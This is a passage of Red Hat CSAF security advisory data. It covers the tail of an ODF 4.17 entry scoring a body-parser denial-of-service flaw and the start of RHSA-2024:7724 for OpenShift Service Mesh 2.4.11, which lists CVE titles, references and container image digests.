"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
}
]
}
RHSA-2024:7724
Vulnerability from csaf_redhat - Published: 2024-10-07 09:22 - Updated: 2025-11-21 19:13Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.4.11
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Service Mesh Containers for 2.4.11\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* envoy: abnormal termination when using auto_sni with authority header longer than 255 characters (CVE-2024-32475)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:7724",
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7724.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.11",
"tracking": {
"current_release_date": "2025-11-21T19:13:59+00:00",
"generator": {
"date": "2025-11-21T19:13:59+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2024:7724",
"initial_release_date": "2024-10-07T09:22:37+00:00",
"revision_history": [
{
"date": "2024-10-07T09:22:37+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-07T09:22:37+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T19:13:59+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHOSSM 2.4 for RHEL 8",
"product": {
"name": "RHOSSM 2.4 for RHEL 8",
"product_id": "8Base-RHOSSM-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:service_mesh:2.4::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Service Mesh"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"product": {
